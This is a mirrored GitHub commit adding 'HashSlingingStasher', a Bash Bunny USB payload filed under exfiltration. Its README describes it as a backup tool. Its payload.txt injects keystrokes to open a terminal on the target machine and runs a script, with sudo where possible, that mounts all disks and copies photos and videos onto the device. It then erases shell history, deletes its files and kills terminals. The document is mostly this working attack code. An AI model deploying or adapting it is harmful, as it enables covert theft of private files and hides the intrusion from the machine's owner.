HAK5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-12-19 19:48:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #667 from theSW4n/master

Browse Source 
HashSlingingStasher (HSS) Submission
This commit is contained in:
Peaks
2025-02-04 11:02:20 -05:00
committed by GitHub
parent 8cb9f0be03 1871ceb8e6
commit 6f7196803d
5 changed files with 348 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

85
payloads/library/exfiltration/HashSlingingStasher/README.md Executable file
View File

@@ -0,0 +1,85 @@
<pre>
NNNNNNNNNNNNNNNX0kxol:;'..... ...,:lkKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNN0xl:,.. .,:o0NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNOl'. .,xXNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNKo. .lKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNN0: .cKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNK; .lKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNXc .dNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNo. ,ONNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNO' .lXNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNXc ;0NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNO' 'ONNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNo .;ccccccccccllloodxOXNNNNNNNNNNNNNN
NK; ..... .cKNNNNNNNNNNNNN
NO' .xNNNNNNNNNNNNN
Nx. H A S H . ... .ONNNNNNNNNNNNN
Nd. ...... ..... lXNNNNNNNNNNNNN
Nl S L I N G I N G ...... ... ;0NNNNNNNNNNNNNN
Xc .. ,ONNNNNXK0KXNNNNN
K; S T A S H E R .cKNNNNN0dc;:cldkKX
K, .:kXNNNNXxcdd:co:,,:o
O' by .;o0XNNNNNKocddcd0x::c;;
k. ....',:ldkKNNNNNNNNOccoclkkl:oxl:x
x. theSW4n .l0KKXNNNNNNNNNNNNNKl,:;lko:ldl:lOX
d .lXNNNNNNNNNNNNNNNNX0o,,:::ol;cxKNN
l .:ok0XXXK0OxdldKNNKxlldoc:;cxKNNNN
c ..,;,'.. ;xdcoOXNNK00XNNNNNN
; .:OXNNNNNNNNNNNNNN
, lNNNNNNNNNNNNNNNN
' cXNNNNNNNNNNNNNNN
. .':o0NNNNNNNNNNNNNNNN
. .. ..''''',;:cox0XNNNNNNNNNNNNNNNNNNN
.. .xNXXXXNNNNNNNNNNNNNNNNNNNNNNNNNNN
... .dNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
.... .xNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
. .... .;dKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
Ko. ...... .';cd0XNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
Nk,. .oKk, ....';:col. .;OXNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNXOdl;.. 'ONNd. ....';cxXNl .;dKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNXOxl;oXNN0:.... .....',:xXN0l,........';dKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNXXNNNNXK0OOOOO00KXXNNNNNNXXKKKKKKXXNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
</pre>
HSS is a data backup tool for MacOS and Linux targets (tested on MacOS 13.x/14.0, Ubuntu 22.04.3 LTS, Manjaro 23.0.4, and Kali Linux 2023.3) (not compatible with Windows). It is designed to find and copy user defined file types/sizes to the udisk on the Bash Bunny, and keep track of them using checksums. This allows the user to scan, stop, and revisit the target to resume copying only new files, skipping those previously copied.
# Instructions
If using a MicroSD XC card for your Bash Bunny Mark II, format it using FAT32 and name it "BashBunny".
Variables/options are set in payload.txt. By default, the script will recursively search the root directory of the target OS for image and video file extensions and copy only files greater than 10KB in size.
Copy the payload.txt and hss_bbscript.sh into the payload/switch folder on the Bash Bunny. If you have an existing checksums.txt file (a list of checksums for files which have been copied previously) you want to use, make sure to copy it to .../BashBunny/loot/hss/ on the Bash Bunny as well (or on the SD card if applicable). The list should contain one CRC-32 checksum per line.
Backup checksums.txt after running HSS and name it something specific so that you know which target it corresponds to. You probably wouldn't want to use the same list on multiple targets, especially if there is a low chance of them containing the same files, because the script will take longer to parse the irrelevant checksums from the existing list. But this depends on your use case. If you want to return to a specific target at a later time, just copy and rename the corresponding checksums file back to "checksums.txt" in the loot directory, and pick up where you left off (looking for new/modified files).
If the script completes its scan of the target system, it will create a file called "nosferatu" in the loot directory. Otherwise you may simply come back and run the HSS script again to resume scanning at any time. nosferatu is deleted at the beginning of each scan, if it exists on the Bash Bunny already.
Unplug the Bash Bunny device when the script is finished, or at any time if you wish to return and finish later. You may now move the files off of the device for storage elsewhere, if desired. Leave the checksums.txt file inside the loot directory on the device if the script did not complete. The script will pick up where it left off, skipping over any files that were copied before (as long as checksums.txt is left on the device).
# Nuances
The tool will attempt to mount all connected disks and run as super user if possible (better results), unmounting whatever was not previously mounted before, once the script completes.
If an unsupported filesystem is connected, you may instead run the script from a bootable USB OS attached to the target, which supports the desired filesystem.
MacOS Time Machine backups and hidden ".Trashes" folders can not be accessed by running this script from the local machine running MacOS, unless full disk access has been granted to the termial application. You can do this relatively quickly (if you have the password to the user logged in) by pressing command + space, type "full disk access" and press return, then click the toggle to enable Terminal if it is not already enabled. Don't forget to turn it off afterwards if you go this route.
If you unplug the Bash Bunny before the script finishes, and then modify payload.txt, you will have to manually delete the .../BashBunny/HSS directory for the changes to take effect.
# LED Status Indicators (Standard)
SETUP.... Magenta solid
ATTACK... Yellow single blink
FINISH... Green 1000ms VERY FAST blink followed by SOLID
# hss_checksummer.sh
### To manually generate or update your checksum list for files which you have already copied
Manually run this script in the parent directory above a directory called "backup" containing files you want to add to a checksums.txt list. Then take the checksums.txt file and place it in .../loot/hss/ to prevent the files from being copied to the .../loot/hss/backups/ directory the next time HSS is run.
# hss_cleanup.sh
### To manually perform cleanup functions on the loot directory
Manually run this script inside the .../loot/hss/ directory to unhide hidden files, and sort files into directories based on their file extension inside the loot directory.

76
payloads/library/exfiltration/HashSlingingStasher/hss_bbscript.sh Executable file
View File

@@ -0,0 +1,76 @@
#!/bin/bash
# Variables (defined by user in payload.txt)
mountpt=$(mount | grep -i $DRIVE_LABEL | cut -d ' ' -f 3)
lootdir=$mountpt/loot/hss
###### Create loot directory and remove nosferatu if it already exists, which serves as the indicator whether or not the script has fully completed in the past ######
mkdir -p $lootdir
cd $lootdir
rm nosferatu
mkdir ./backup
touch ./checksums.txt
chmod 777 ./backup/ ./checksums.txt
mounted=" "
mntdir=" "
###### Mount all unmounted, connected drives and store theier device name to unmount them again at the end of the script ######
# For MacOS
if uname | grep -i darwin; then for i in `ls /dev | awk -v s="disk" 'index($0, s) == 1'`; do if diskutil info $i | grep -i "Mounted" | grep -qi "Yes"; then :; else mounted+="$i " && diskutil mountDisk $i; fi; done; fi
# For Linux
if uname | grep -i darwin; then :; else
partitions=$(lsblk -o NAME,MOUNTPOINT -nr)
while IFS= read -r line; do
name=$(echo "$line" | awk '{print $1}')
mountpoint=$(echo "$line" | awk '{print $2}')
# Check if the partition is not mounted
if [ -z "$mountpoint" ]; then
# Attempt to mount the partition
udisksctl mount -b "/dev/$name" && mounted+="/dev/$name "
fi
done <<< "$partitions"
fi
###### Find all files under a given directory of a given size and filetype, copy the files to a folder on the USB drive, and save their checksums to a running list ######
find "$target_directory" -path "$mountpt/loot/hss" -prune -o -size $find_file_size -type f \( -name "" `for i in ${target_extensions[@]}; do echo "-o -iname "*.$i" "; done` \) -exec echo {} ';' | while read p; do
if cat ./checksums.txt | grep -qw `cksum "$(echo "$p" | tr -d '\\\')" | cut -d ' ' -f1`; then
:
else
if [ -f "./backup/${p##*/}" ]; then
cp "$p" "./backup/`cksum "$(echo "$p" | tr -d '\\\')" | cut -d ' ' -f1`_${p##*/}"
if [ $? -ne 0 ] ; then
# Provide indication the drive was full, and unmount only the disks that were mounted at the beginning of the script
touch ./disk_drive_full
if uname | grep -i darwin; then for i in $mounted; do diskutil unmountDisk $i; done; fi
if uname | grep -i darwin; then :; else for i in $mounted; do udisksctl unmount -b $i; done; fi
exit 1
else
echo `cksum "$(echo "$p" | tr -d '\\\')" | cut -d ' ' -f1` >> ./checksums.txt
fi
else
cp "$p" "./backup/"
if [ $? -ne 0 ] ; then
# Provide indication the drive was full, and unmount only the disks that were mounted at the beginning of the script
touch ./disk_drive_full
if uname | grep -i darwin; then for i in $mounted; do diskutil unmountDisk $i; done; fi
if uname | grep -i darwin; then :; else for i in $mounted; do udisksctl unmount -b $i; done; fi
exit 1
else
echo `cksum "$(echo "$p" | tr -d '\\\')" | cut -d ' ' -f1` >> ./checksums.txt
fi
fi
fi
done
###### Unmount only the disks that were mounted at the beginning of the script, and provide indication that the script completed successfully ######
if [ $? -ne 0 ] ; then
:
else
if uname | grep -i darwin; then for i in $mounted; do diskutil unmountDisk $i; done; fi
if uname | grep -i darwin; then :; else for i in $mounted; do udisksctl unmount -b $i; done; fi
touch nosferatu
fi

5
payloads/library/exfiltration/HashSlingingStasher/hss_checksummer.sh Executable file
View File

@@ -0,0 +1,5 @@
#!/bin/bash -x
# Run this script in the parent directory above the "backup" folder containing files you want to add to a checksums.txt list. Then take the checksums.txt file and place it in .../loot/hss/ to prevent the files from being copied to the .../loot/hss/backups/ directory the next time HSS is run.
find ./backup | while read p; do if cat ./checksums.txt | grep -qw `cksum "$(echo "$p" | tr -d '\')" | cut -d ' ' -f1`; then : ; else echo `cksum "$(echo "$p" | tr -d '\')" | cut -d ' ' -f1` >> ./checksums.txt; fi; done

7
payloads/library/exfiltration/HashSlingingStasher/hss_cleanup.sh Executable file
View File

@@ -0,0 +1,7 @@
#!/bin/bash -x
# Run this script inside the .../loot/hss/ directory to perform cleanup functions on the loot directory: unhide hidden files, and sort files into directories based on their file extension
find ./backup/ -type f -name '\.*' -print | while read p; do mv $p ./backup/`echo $p | cut -b 11-`; done
ls ./backup/ | while read p; do mkdir ./backup/"${p##*.}"; done
ls ./backup/ | while read p; do mv ./backup/"$p" ./backup/"${p##*.}"/; done

175
payloads/library/exfiltration/HashSlingingStasher/payload.txt Executable file
View File

@@ -0,0 +1,175 @@
# Title: Hash Slinging Stasher for Bash Bunny
# Description: Copies files to Bash Bunny udisk from the target OS matching given extensions and file size only if their checksum does not appear in a user defined or generated checksum list, and appends the checksum of copied files to that list.
# Author: theSW4n
# Version: 1.0
# Category: Exfiltration
# Target: Tested on MacOS 13.x/14.0, Ubuntu 22.04.3 LTS, Manjaro 23.0.4, and Kali Linux 2023.3 (not compatible with Windows)
# Attackmodes: HID, Storage
# Options
hss_target_directory=/
hss_target_extensions="jpg jpeg gif bmp raw webp psd orf rw2 flv webm ogg h264 hevc heic heif dng cr2 tiff crw nef pef mov qt mp4 m4p m4v mpg mpe mpv m2v svi 3gp 3g2 mpeg avi wmv mts m2ts ts png"
hss_find_file_size=+10k
DRIVE_LABEL="BashBunny"
######## SETUP PHASE ########
LED SETUP
GET SWITCH_POSITION
mount /dev/nandf /root/udisk
rm -rf /root/HSS
cp -r /root/udisk/payloads/${SWITCH_POSITION} /root/HSS
sync
umount /dev/nandf
udisk mount
mv -f /root/HSS /root/udisk/HSS
sync
udisk umount
ATTACKMODE HID STORAGE
######## ATTACK PHASE ########
LED ATTACK
QUACK GUI SPACE
QUACK GUI
QUACK STRING "terminal"
QUACK ENTER
QUACK DELAY 1500
QUACK STRING "qterminal"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "n"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "gnome-terminal"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "n"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "xterm"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "n"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "konsole"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "n"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "lxterminal"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "n"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "urxvt"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "n"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "st"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "n"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "alacritty"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "n"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "xfce4-terminal"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "n"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "tilda"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "n"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "udisksctl mount -b /dev/disk/by-label/$DRIVE_LABEL"
QUACK ENTER
QUACK DELAY 1500
QUACK STRING "cp -rf \$(mount | grep -i $DRIVE_LABEL | cut -d ' ' -f 3)/HSS /tmp"
QUACK ENTER
QUACK DELAY 1500
QUACK STRING "chmod -R 755 /tmp/HSS"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "cd /tmp/HSS"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "/bin/bash"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "target_directory=$hss_target_directory"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "export target_directory"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "target_extensions=\""$hss_target_extensions\"""
QUACK ENTER
QUACK DELAY 500
QUACK STRING "export target_extensions"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "find_file_size=$hss_find_file_size"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "export find_file_size"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "DRIVE_LABEL=$DRIVE_LABEL"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "export DRIVE_LABEL"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "if [ \""\$EUID\"" -ne 0 ]; then \$(find ~+ -name"
QUACK STRING " \""hss_bbscript.sh\""); else \$(sudo \$(find ~+ -name"
QUACK STRING " \""hss_bbscript.sh\"")); fi"
QUACK ENTER
QUACK DELAY 1000
sync
QUACK STRING "exit"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "export HISTIGNORE=\""*\"""
QUACK ENTER
QUACK DELAY 500
QUACK STRING "cd /"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "rm -rf /tmp/HSS"
QUACK ENTER
QUACK DELAY 1500
QUACK STRING "rm -rf \$(mount | grep -i $DRIVE_LABEL | cut -d ' ' -f 3)/HSS"
QUACK ENTER
QUACK DELAY 1500
QUACK STRING "udisksctl unmount -b /dev/disk/by-label/$DRIVE_LABEL"
QUACK ENTER
QUACK DELAY 1500
QUACK STRING "diskutil eject \$(mount | grep -i $DRIVE_LABEL | cut -d ' ' -f 3)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "unset target_directory & unset target_extensions & unset find_file_size & unset DRIVE_LABEL"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "history -c && history -w"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "killall qterminal & killall gnome-terminal- & killall Terminal & killall xterm & killall konsole & killall lxterminal & killall urxvt & killall st & killall alacritty & killall xfce4-terminal & killall tilda"
QUACK ENTER
QUACK DELAY 500
sync
LED FINISH